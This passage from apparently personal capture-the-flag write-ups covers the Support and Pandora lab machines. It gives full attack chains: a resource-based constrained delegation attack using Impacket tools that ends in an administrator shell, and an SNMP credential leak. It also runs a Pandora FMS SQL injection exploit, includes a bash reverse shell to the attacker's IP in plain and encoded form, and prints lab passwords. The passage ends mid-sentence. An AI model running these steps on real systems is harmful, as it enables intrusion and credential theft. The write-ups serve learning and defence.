            "mtime_epoch": "2022-05-28 13:19:19",
            "size": "2.75 MB"
        },
        "UserInfo.exe.zip": {
            "atime_epoch": "2022-05-28 13:19:31",
            "ctime_epoch": "2022-05-28 13:19:31",
            "mtime_epoch": "2022-05-28 13:19:31",
            "size": "45.87 MB"
        },
        "UserInfo.exe.zip": {
            "atime_epoch": "2022-07-20 19:01:07",
            "ctime_epoch": "2022-07-20 19:01:06",
            "mtime_epoch": "2022-07-20 19:01:07",
            "size": "271 KB"
        },
        "WiresharkPortable64_3.6.5.paf.exe": {
            "atime_epoch": "2022-05-28 13:19:43",
            "ctime_epoch": "2022-05-28 13:19:43",
            "mtime_epoch": "2022-05-28 13:19:43",
            "size": "42.34 MB"
        },
        "npp.8.4.1.portable.x64.zip": {
            "atime_epoch": "2022-05-28 13:19:55",
            "ctime_epoch": "2022-05-28 13:19:55",
            "mtime_epoch": "2022-05-28 13:19:55",
            "size": "5.19 MB"
        },
        "putty.exe": {
            "atime_epoch": "2022-05-28 13:20:06",
            "ctime_epoch": "2022-05-28 13:20:06",
            "mtime_epoch": "2022-05-28 13:20:06",
            "size": "1.21 MB"
        },
        "windirstat1_1_2_setup.exe": {
            "atime_epoch": "2022-05-28 13:20:17",
            "ctime_epoch": "2022-05-28 13:20:17",
            "mtime_epoch": "2022-05-28 13:20:17",
            "size": "77.32 KB"
        }
    }
}

UserInfo.exe.zip : .NET executable

$ nxc smb 10.10.11.174 -u 'guest' -p '' --get-file \\UserInfo.exe.zip UserInfo.exe.zip --share support-tools
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\guest:
SMB 10.10.11.174 445 DC [*] Copying "\UserInfo.exe.zip" to "UserInfo.exe.zip"
SMB 10.10.11.174 445 DC [+] File "\UserInfo.exe.zip" was downloaded to "UserInfo.exe.zip"

This zip contains a custom binary, UserInfo.exe.
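UserInfo.exe talks to the domain controller over LDAP, so besides decompiling it (next) there is a second way to get at the credential it embeds: capture its traffic. An LDAP simple bind is plain BER, with the DN and the password sitting in the BindRequest as octet strings, which is why Wireshark shows them in clear on port 389. The following is an added example, not code from this page or from the tool: a minimal encoder to build a sample BindRequest and a decoder that pulls the DN and password out of it, the same fields a pcap dissector would show. The packet is constructed here, not captured from the box; the DN and password are the ldap account's as found on this page.

```python
"""LDAP simple BindRequest: build one and decode one (BER, RFC 4511)."""
from typing import List, Optional, Tuple

LDAP_MESSAGE = 0x30   # SEQUENCE
BIND_REQUEST = 0x60   # [APPLICATION 0], constructed
AUTH_SIMPLE = 0x80    # [0] simple, primitive: the clear-text password
AUTH_SASL = 0xA3      # [3] sasl, constructed: no password in here


def _ber_length(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def ber(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + _ber_length(len(payload)) + payload


def build_simple_bind(message_id: int, dn: str, password: str) -> bytes:
    """BindRequest ::= { version 3, name dn, authentication simple(password) }.
    message_id is kept below 128 so the INTEGER needs no leading sign byte."""
    bind = ber(0x02, bytes([3])) + ber(0x04, dn.encode()) + ber(AUTH_SIMPLE, password.encode())
    return ber(LDAP_MESSAGE, ber(0x02, bytes([message_id])) + ber(BIND_REQUEST, bind))


def read_tlv(buf: bytes, pos: int = 0) -> Tuple[int, bytes, int]:
    """Return (tag, value, position after the element); handles long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        count = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + count], "big"), pos + count
    return tag, buf[pos:pos + length], pos + length


def read_children(payload: bytes) -> List[Tuple[int, bytes]]:
    items, pos = [], 0
    while pos < len(payload):
        tag, value, pos = read_tlv(payload, pos)
        items.append((tag, value))
    return items


def extract_simple_bind(packet: bytes) -> Optional[Tuple[int, str, str]]:
    """(message_id, dn, password) for a simple bind; None for any other LDAP message."""
    tag, body, _ = read_tlv(packet)
    if tag != LDAP_MESSAGE:
        return None
    parts = read_children(body)
    if len(parts) < 2 or parts[0][0] != 0x02 or parts[1][0] != BIND_REQUEST:
        return None
    message_id = int.from_bytes(parts[0][1], "big")
    fields = read_children(parts[1][1])
    if len(fields) < 3 or fields[2][0] != AUTH_SIMPLE:
        return None
    return message_id, fields[1][1].decode(), fields[2][1].decode()


# Constructed packets, not captures: the credential is the ldap account's from this page.
SAMPLE_PACKET = build_simple_bind(1, "support\\ldap", "nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz")
SASL_PACKET = ber(LDAP_MESSAGE, ber(0x02, b"\x02") + ber(BIND_REQUEST,
    ber(0x02, b"\x03") + ber(0x04, b"") + ber(AUTH_SASL, ber(0x04, b"GSS-SPNEGO"))))

if __name__ == "__main__":
    print(SAMPLE_PACKET.hex())
    print(extract_simple_bind(SAMPLE_PACKET))
    print(extract_simple_bind(SASL_PACKET))
```

The SASL packet is there as the contrast: a client that binds with GSS-SPNEGO (Kerberos/NTLM) never puts the password on the wire, so the same capture technique yields nothing against it, and LDAP over TLS (636) hides the simple bind as well.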
Decompiling the binary, we find a string that looks like an encrypted password together with a key:

"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
"armando"

A getPassword function seems to decrypt this string with the key through a simple transformation. With ChatGPT's help I understood how the code works and had it produce a Python equivalent of the .NET code, which gave me the password:

import base64

# Values recovered from the decompiled UserInfo.exe
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"


def get_password(enc_b64: str, key: bytes) -> str:
    """Mirror of the .NET getPassword(): base64-decode, then XOR every byte
    with the repeating key and with the constant 0xDF."""
    enc_bytes = base64.b64decode(enc_b64)
    dec_bytes = bytearray(b ^ key[i % len(key)] ^ 0xDF for i, b in enumerate(enc_bytes))
    return dec_bytes.decode("utf-8", errors="ignore")


print(get_password(enc_password, key))

Running the script prints the password:

ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Interestingly, another intended approach was to run the program, which performs authenticated LDAP queries with the "ldap" account, and simply capture the traffic with Wireshark to read the password off the wire.

Of course, on OSCP day no chatbot is allowed, so favour the second method unless you have a very good .NET decompiler at hand.

RustHound / BloodHound : "support" account

We run RustHound with the ldap account to collect the domain data, then analyse it in BloodHound.
The support account looks very interesting, because there is a path from this user to control of the DC:

$ rusthound -d support.htb -u "ldap"@"support.htb" -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -o /workspace/Support/bloodhound_data --zip -n 10.10.11.174
---------------------------------------------------
Initializing RustHound at 23:06:53 on 09/09/25
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2025-09-09T21:06:53Z INFO  rusthound] Verbosity level: Info
[2025-09-09T21:06:53Z INFO  rusthound::ldap] Connected to SUPPORT.HTB Active Directory!
[2025-09-09T21:06:53Z INFO  rusthound::ldap] Starting data collection...
[2025-09-09T21:06:54Z INFO  rusthound::ldap] All data collected for NamingContext DC=support,DC=htb
[2025-09-09T21:06:54Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2025-09-09T21:06:54Z INFO  rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2025-09-09T21:06:54Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2025-09-09T21:06:54Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2025-09-09T21:06:54Z INFO  rusthound::json::checker] Checking and replacing some values finished!
[2025-09-09T21:06:54Z INFO  rusthound::json::maker] 21 users parsed!
[2025-09-09T21:06:54Z INFO  rusthound::json::maker] 61 groups parsed!
[2025-09-09T21:06:54Z INFO  rusthound::json::maker] 2 computers parsed!
[2025-09-09T21:06:54Z INFO  rusthound::json::maker] 1 ous parsed!
[2025-09-09T21:06:54Z INFO  rusthound::json::maker] 1 domains parsed!
[2025-09-09T21:06:54Z INFO  rusthound::json::maker] 2 gpos parsed!
[2025-09-09T21:06:54Z INFO  rusthound::json::maker] 21 containers parsed!
[2025-09-09T21:06:54Z INFO  rusthound::json::maker] /workspace/Support/bloodhound_data/20250909230654_support-htb_rusthound.zip created!

RustHound Enumeration Completed at 23:06:54 on 09/09/25! Happy Graphing!

We notice that the support account is a member of the SHARED SUPPORT ACCOUNTS group, which has GenericAll over the DC computer object. However, we cannot find any way to take over the support account from BloodHound alone.

ldapsearch : support's password

Querying the Active Directory directly with ldapsearch, we see an "info" attribute that BloodHound did not display. It contains... the support user's password:

$ ldapsearch -x -H ldap://10.10.11.174 -D "support\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" | grep -i "sAMAccountName.*support" -A10 -B25
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful                      # <<<<<-------- HERE
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
...
lastLogon: 0
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
...
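The BloodHound path ends in GenericAll over DC$, which the next section turns into resource-based constrained delegation by writing the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute. That attribute holds a binary security descriptor whose DACL lists the accounts allowed to delegate to the computer. The following is an added example, not code from this page or from Impacket: it builds such a descriptor in the shape rbcd.py writes (owner BUILTIN\Administrators, one access-allowed ACE with full control per SID) and parses one back, which is also the check a defender runs to audit who has been granted delegation to a domain controller. The SID used is the HACKED$ one that rbcd.py prints on this page; no LDAP call is made.

```python
"""Build and audit the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor."""
import struct
from typing import List

FULL_CONTROL = 0x000F01FF             # SDDL CCDCLCSWRPWPDTLOCRSDRCWDWO, the mask rbcd.py grants
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
HACKED_SID = "S-1-5-21-1677581083-3380853377-188903654-5601"   # HACKED$ as printed by rbcd.py on this page


def sid_to_bytes(sid: str) -> bytes:
    """S-1-<authority>-<sub>... -> revision, count, 48-bit BE authority, LE sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string")
    subs = [int(p) for p in parts[3:]]
    return bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, "big") + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(buf: bytes) -> str:
    revision, count = buf[0], buf[1]
    authority = int.from_bytes(buf[2:8], "big")
    subs = struct.unpack("<%dI" % count, buf[8:8 + 4 * count])
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def build_rbcd_sd(sids: List[str]) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR: header, owner SID, then a DACL with one ACE per SID."""
    aces = b""
    for sid in sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0x00, 8 + len(sid_b), FULL_CONTROL) + sid_b
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces   # ACL_REVISION 2
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         20, 0, 0, 20 + len(owner))                           # offsets: owner, group, sacl, dacl
    return header + owner + acl


def parse_rbcd_sd(blob: bytes) -> List[str]:
    """SIDs allowed to act on behalf of other identities, i.e. every access-allowed ACE trustee."""
    _rev, _sbz, control, _owner, _group, _sacl, off_dacl = struct.unpack("<BBHIIII", blob[:20])
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _acl_size, ace_count, _ = struct.unpack("<BBHHH", blob[off_dacl:off_dacl + 8])
    pos, trustees = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, _mask = struct.unpack("<BBHI", blob[pos:pos + 8])
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            trustees.append(bytes_to_sid(blob[pos + 8:pos + ace_size]))
        pos += ace_size
    return trustees


if __name__ == "__main__":
    sd = build_rbcd_sd([HACKED_SID])
    print(sd.hex())
    print("allowed to delegate:", parse_rbcd_sd(sd))
```

Reading the attribute back from the DC$ object (with ldapsearch or any LDAP client) and feeding the raw value to parse_rbcd_sd is the audit step: on a domain controller this list should normally be empty, and an unknown machine account in it is exactly the artefact the attack below leaves behind.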
Privilege Escalation

Generic All on DC : Resource-Based Constrained Delegation attack

We saw earlier that support belongs to a group with GenericAll over the DC. That is enough for a resource-based constrained delegation attack: GenericAll on the DC$ computer object lets us write its msDS-AllowedToActOnBehalfOfOtherIdentity attribute, and the MachineAccountQuota of 10 reported by RustHound lets us create the computer account we will delegate from. Following the guidance BloodHound gives for this edge, here is an example exploitation:

# First, if an attacker does not control an account with an SPN set, a new attacker-controlled computer account can be added with Impacket's addcomputer.py example script:

$ addcomputer.py -computer-name 'HACKED$' -computer-pass 'hacked123!' -dc-host DC.SUPPORT.HTB -domain-netbios support.htb support.htb/'support':'Ironside47pleasure40Watchful'
[*] Successfully added machine account HACKED$ with password hacked123!.

# We now need to configure the target object so that the attacker-controlled computer can delegate to it. Impacket's rbcd.py script can be used for that purpose:

$ rbcd.py -delegate-from "HACKED$" -delegate-to 'DC$' -dc-ip "10.10.11.174" -action write "support.htb"/"support":'Ironside47pleasure40Watchful'
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] HACKED$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     HACKED$   (S-1-5-21-1677581083-3380853377-188903654-5601)

# And finally we can get a service ticket for the service name (sname) we want to "pretend" to be "admin" for. Impacket's getST.py example script can be used for that purpose.

$ getST.py -spn CIFS/dc.support.htb -impersonate Administrator -dc-ip "10.10.11.174" "support.htb"/'HACKED$':'hacked123!'
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@CIFS_dc.support.htb@SUPPORT.HTB.ccache

$ mv Administrator@CIFS_dc.support.htb@SUPPORT.HTB.ccache admin.ccache
$ export KRB5CCNAME="admin.ccache"

# This ticket can then be used with Pass-the-Ticket, and could grant access to the file system of the TARGETCOMPUTER.

$ psexec.py -k -no-pass support.htb/Administrator@dc.support.htb
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file phZHHPqE.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service YbSC on dc.support.htb.....
[*] Starting service YbSC.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> type C:\Users\support\Desktop\user.txt
1e30.....0c23

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
a848.....12cf

getST.py does the two S4U exchanges for us: S4U2self obtains a ticket for Administrator to HACKED$ itself, then S4U2proxy presents it to get a CIFS ticket for dc.support.htb, which the DC grants because HACKED$ is now listed in its msDS-AllowedToActOnBehalfOfOtherIdentity. Impersonation fails for accounts marked "sensitive and cannot be delegated" or in the Protected Users group, so pick a target that is not.

Tips

I did not find the support user's password until I went back to ldapsearch.

Advice: after a long session in BloodHound, when you spot an interesting account or group, always inspect it with ldapsearch afterwards to make sure there is no extra information, such as a password in the description or info attribute.

Date: 2025-09-07. Permalink: https://leopoldabgn.github.io/writeups/p/support-htb/. Title: HTB | Support

HTB | Pandora

Machine name: Pandora. OS: Linux. IP: 10.10.11.136. Difficulty: Easy

Users
daniel : HotelBabylon23

Enumeration

nmap TCP

$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.136
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24c295a5c30b3ff3173c68d7af2b5338 (RSA)
| ssh-rsa AAAAB3...........Dd8TnI/DFFs=
|   256 b1417799469a6c5dd2982fc0329ace03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLX..........Dea3F/CxfOQeqLpanqso/EqXcT9w=
|   256 e736433ba9478a190158b2bc89f65108 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)

Website (port 80)

Nothing interesting! The site is built on a Bootstrap template, with nothing to report.
No suspicious files, no CVE, no XSS or SQL injection.

nmap UDP

A scan of the top 1000 UDP ports reveals port 161 with an SNMP server:

$ nmap -sU -sV --top-ports 1000 -T4 -vvv 10.10.11.136
PORT      STATE         SERVICE         REASON              VERSION
23/udp    open|filtered telnet          no-response
161/udp   open          snmp            udp-response ttl 63 SNMPv1 server; net-snmp SNMPv3 server (public)
177/udp   open|filtered xdmcp           no-response
520/udp   open|filtered route           no-response
539/udp   open|filtered apertus-ldp     no-response
688/udp   open|filtered realm-rusd      no-response
782/udp   open|filtered hp-managed-node no-response
983/udp   open|filtered unknown         no-response
1026/udp  open|filtered win-rpc         no-response
1038/udp  open|filtered mtqp            no-response
1419/udp  open|filtered timbuktu-srv3   no-response
1719/udp  open|filtered h323gatestat    no-response
2161/udp  open|filtered apc-2161        no-response
2967/udp  open|filtered symantec-av     no-response
4008/udp  open|filtered netcheque       no-response
5001/udp  open|filtered commplex-link   no-response
6004/udp  open|filtered X11:4           no-response
16739/udp open|filtered unknown         no-response
17585/udp open|filtered unknown         no-response
17823/udp open|filtered unknown         no-response
18485/udp open|filtered unknown         no-response
18987/udp open|filtered unknown         no-response
19140/udp open|filtered unknown         no-response
19315/udp open|filtered keyshadow       no-response
19632/udp open|filtered unknown         no-response
19682/udp open|filtered unknown         no-response
20003/udp open|filtered commtact-https  no-response
20004/udp open|filtered unknown         no-response
20791/udp open|filtered unknown         no-response
21320/udp open|filtered unknown         no-response
21524/udp open|filtered unknown         no-response
21923/udp open|filtered unknown         no-response
22053/udp open|filtered unknown         no-response
27899/udp open|filtered unknown         no-response
31625/udp open|filtered unknown         no-response
32772/udp open|filtered sometimes-rpc8  no-response
33354/udp open|filtered unknown         no-response
37393/udp open|filtered unknown         no-response
40708/udp open|filtered unknown         no-response
44508/udp open|filtered unknown         no-response
49152/udp open|filtered unknown         no-response
49222/udp open|filtered unknown         no-response
Service Info: Host: pandora

Only 161/udp actually answered; the other entries are "open|filtered" because no response came back, which is what nmap reports for UDP ports that neither reply nor send an ICMP unreachable.

Foothold

snmpwalk : daniel

With the default "public" read community, snmpwalk dumps a lot of host information, including the HOST-RESOURCES-MIB process table (hrSWRunTable), whose hrSWRunParameters column exposes the command-line arguments of every running process:

$ snmpwalk -v2c -c public 10.10.11.136
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (243441) 0:40:34.41
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (34) 0:00:00.34
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
...

$ snmpwalk -v2c -c public 10.10.11.136 > snmpwalk.out
$ grep -rni string snmpwalk.out
...
1867:iso.3.6.1.2.1.25.4.2.1.5.962 = STRING: "--no-debug"
1868:iso.3.6.1.2.1.25.4.2.1.5.977 = STRING: "-k start"
1869:iso.3.6.1.2.1.25.4.2.1.5.1085 = STRING: "-u daniel -p HotelBabylon23"      <----------
1870:iso.3.6.1.2.1.25.4.2.1.5.1225 = STRING: "-k start"
...

This gives us the credentials of the user daniel.
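The grep above works because the password happened to follow "-p"; the general version of the check is to pull the whole hrSWRunTable out of the walk and flag any process whose parameters carry a credential-looking argument. The following is an added example, not code from this page: it parses snmpwalk output for the name (.2), path (.4) and parameters (.5) columns of hrSWRunTable and reports the suspicious processes. The sample lines are constructed for this example (the daniel line reproduces the one found on this page; the other process names are invented), and the list of flag patterns is a heuristic to extend.

```python
"""Scan snmpwalk output for process command lines that carry secrets.
HOST-RESOURCES-MIB hrSWRunTable (1.3.6.1.2.1.25.4.2.1) exposes every
process's name, path and parameters to anyone holding the read community."""
import re
from typing import Dict, List, Tuple

HR_SW_RUN = "1.3.6.1.2.1.25.4.2.1"
COLUMN = {"2": "name", "4": "path", "5": "params"}          # hrSWRunName, hrSWRunPath, hrSWRunParameters
ROW = re.compile(r'^(?:iso|\.?1)\.(\S+) = STRING: "(.*)"$')   # both numeric and "iso." prefixed walks
SECRET_ARG = re.compile(
    r"(?:^|\s)(?:-p|--pass(?:word)?|--secret|pass(?:word|wd)?=|pwd=)\S*", re.I)   # heuristic (assumption)


def parse_walk(lines) -> Dict[int, Dict[str, str]]:
    """pid -> {"name": ..., "path": ..., "params": ...} built from STRING rows of hrSWRunTable."""
    table: Dict[int, Dict[str, str]] = {}
    for line in lines:
        m = ROW.match(line.strip())
        if not m:
            continue
        oid = "1." + m.group(1)
        if not oid.startswith(HR_SW_RUN + "."):
            continue
        column, pid = oid[len(HR_SW_RUN) + 1:].split(".")
        if column in COLUMN:
            table.setdefault(int(pid), {})[COLUMN[column]] = m.group(2)
    return table


def find_process_secrets(lines) -> List[Tuple[int, str, str]]:
    """(pid, process name, parameters) for every process whose arguments look like a credential."""
    hits = []
    for pid, row in sorted(parse_walk(lines).items()):
        params = row.get("params", "")
        if SECRET_ARG.search(params):
            hits.append((pid, row.get("name", "?"), params))
    return hits


# Constructed sample walk (not the full output from the box).
SAMPLE_WALK = [
    'iso.3.6.1.2.1.1.5.0 = STRING: "pandora"',
    'iso.3.6.1.2.1.25.4.2.1.4.977 = STRING: "/usr/sbin/apache2"',
    'iso.3.6.1.2.1.25.4.2.1.2.1085 = STRING: "host_check"',
    'iso.3.6.1.2.1.25.4.2.1.2.1300 = STRING: "mysql"',
    'iso.3.6.1.2.1.25.4.2.1.5.962 = STRING: "--no-debug"',
    'iso.3.6.1.2.1.25.4.2.1.5.977 = STRING: "-k start"',
    'iso.3.6.1.2.1.25.4.2.1.5.1085 = STRING: "-u daniel -p HotelBabylon23"',
    'iso.3.6.1.2.1.25.4.2.1.5.1225 = STRING: "-k start"',
    '.1.3.6.1.2.1.25.4.2.1.5.1300 = STRING: "--password=s3cr3t --host db.internal"',
    'iso.3.6.1.2.1.25.4.2.1.5.1400 = STRING: "-lvnp 4444"',
]

if __name__ == "__main__":
    for pid, name, params in find_process_secrets(SAMPLE_WALK):
        print(f"pid {pid} ({name}): {params}")
```

Feed it the saved walk with find_process_secrets(open("snmpwalk.out")). The defensive reading is the same: anything passed on a command line is visible to SNMP readers, ps, and /proc, so credentials belong in files or environment variables read by the program, not in its arguments.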
Trying them over SSH works:

$ ssh daniel@10.10.11.136
daniel@10.10.11.136's password:
Last login: Fri Sep 5 12:29:55 2025 from 10.10.14.8
-bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
daniel@pandora:~$ whoami
daniel
daniel@pandora:~$ ls /home/
daniel  matt

We discover a second user, matt.

daniel -> matt

Pandora FMS v7.0NG.742

There is a "pandora_console" directory under /var/www, and /etc/hosts suggests a second website served only on 127.0.0.1:80. I forwarded that port so I could browse it from my machine on port 8888:

ssh daniel@10.10.11.136 -L 8888:127.0.0.1:80

This lands on a Pandora FMS v7.0NG.742 login page.

CVE-2021-32099

A quick search turns up several CVEs for this version, among them an unauthenticated SQL injection, CVE-2021-32099. It lets us obtain an admin session and, from there, upload a PHP file that executes commands on the machine as the user matt (the account the web server runs as).

Exploit: https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/tree/master

I used this already-written exploit, which performs the SQL injection and uploads the PHP file for us.
It gives us a non-interactive shell.\nI took a reverse shell command, base64-encoded it and then URL-encoded the whole thing, because the Python script sends a GET request to the PHP file and passes the commands in the URL.\npython3 sqlpwn.py -t 127.0.0.1:8888 URL: http://127.0.0.1:8888/pandora_console [+] Sending Injection Payload [+] Requesting Session [+] Admin Session Cookie : lkgcnm6itdo17dmogbhc6733j1 [+] Sending Payload [+] Respose : 200 [+] Pwned :) [+] If you want manual Control : http://127.0.0.1:8888/pandora_console/images/pwn.php?test= CMD > bash -i >& /dev/tcp/10.10.14.8/1337 0>&1 CMD > echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC44LzEzMzcgMD4mMQ%3D%3D%20%7C%20base64%20-d%20%7C%20bash -------------------------------------- $ nc -lnvp 1337 matt@pandora:/var/www/pandora/pandora_console/images$ python3 -c 'import pty;pty.spawn(\"/bin/bash\")' <ges$ python3 -c 'import pty;pty.spawn(\"/bin/bash\")' matt@pandora:/var/www/pandora/pandora_console/images$ export TERM=xterm export TERM=xterm matt@pandora:/var/www/pandora/pandora_console/images$ ^Z [1] + 27546 suspended nc -lnvp 1337 $ stty raw -echo;fg [1] + 27546 continued nc -lnvp 1337 matt@pandora:/var/www/pandora/pandora_console/images$ whoami matt matt@pandora:/var/www/pandora/pandora_console/images$ cd /home/matt matt@pandora:/home/matt$ cat user.txt 2251.....82e1\nPandora Database Creds\nI found the MySQL database password, but the password hashes could not be cracked. 
Except daniel's, which does match the password used for SSH.\nmatt@pandora:~$ cat /var/www/pandora/pandora_console/include/config.php <?php // File generated by centos kickstart $config[\"dbtype\"] = \"mysql\";\t$config[\"dbname\"]=\"pandora\";\t$config[\"dbuser\"]=\"pandora\";\t$config[\"dbpass\"]=\"PandoraFMSSecurePass2021\"; $config[\"dbhost\"]=\"localhost\";\t$config[\"homedir\"]=\"/var/www/pandora/pandora_console\"; $config[\"homeurl\"]=\"/pandora_console\";\terror_reporting(0); $ownDir = dirname(__FILE__) . '/'; include ($ownDir . \"config_process.php\"); ?> ------------------- MariaDB [pandora]> select email,password from tusuario; +--------------------+----------------------------------+ | email | password | +--------------------+----------------------------------+ | admin@pandora.htb | ad3f741b04bd5880fb32b54bc4f43d6a | | daniel@pandora.htb | 76323c174bd49ffbbdedf678f6cc89a6 | | matt@pandora.htb | f655f807365b6dc602b31ab3d6d43acc | +--------------------+----------------------------------+ 3 rows in set (0.000 sec)\nmatt -> root\nSSH session\nAt first I tried running \"sudo -l\", but an odd error came up:\nmatt@pandora:/home/matt/.ssh$ sudo -l sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted sudo: unable to initialize policy plugin\nSo I decided to generate a key pair and log in as matt over SSH to get a more stable session. 
This turns out to matter for the exploitation:\n$ ssh-keygen -t rsa -b 4096 -f matt Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in matt Your public key has been saved in matt.pub The key fingerprint is: SHA256:BH80icivzuGhGoIvDyqROBTJ3Yos2GjweEF7u2FwJrI root@exegol-pentest The key's randomart image is: +---[RSA 4096]----+ |..+ .... .o. | |.+.o .oo.... | |==*.= .o . | |=B+B . ... | |Eo + .S | |* . o+ | |+o. .= o | |++ .. + | |oo+. | +----[SHA256]-----+ $ ssh matt@10.10.11.136 -i matt Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. -bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) matt@pandora:~$ sudo -l [sudo] password for matt: # Note that the error is gone here matt@pandora:~$\n/usr/bin/pandora_backup\nUsing linpeas, we find a suspicious SUID binary: /usr/bin/pandora_backup. 
Analysing the binary shows that it runs the tar command as root.\nIt does not call tar by an absolute path such as \"/bin/tar\", which allows a PATH injection attack:\nHere is the decompiled code:\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __uid_t v3; // ebx\n  __uid_t v4; // eax\n\n  v3 = getuid();\n  v4 = geteuid();\n  setreuid(v4, v3);\n  puts(\"PandoraFMS Backup Utility\");\n  puts(\"Now attempting to backup PandoraFMS client\");\n  if ( system(\"tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*\") )\n  {\n    puts(\"Backup failed!\\nCheck your permissions!\");\n    return 1;\n  }\n  else\n  {\n    puts(\"Backup successful!\");\n    puts(\"Terminating program!\");\n    return 0;\n  }\n}\nThe main catch on this box is that without an SSH login the SUID binary does not run as root, and tar fails with Permission denied:\nmatt@pandora:/home/matt/.ssh$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied tar: Error is not recoverable: exiting now Backup failed! Check your permissions!\nOver SSH the 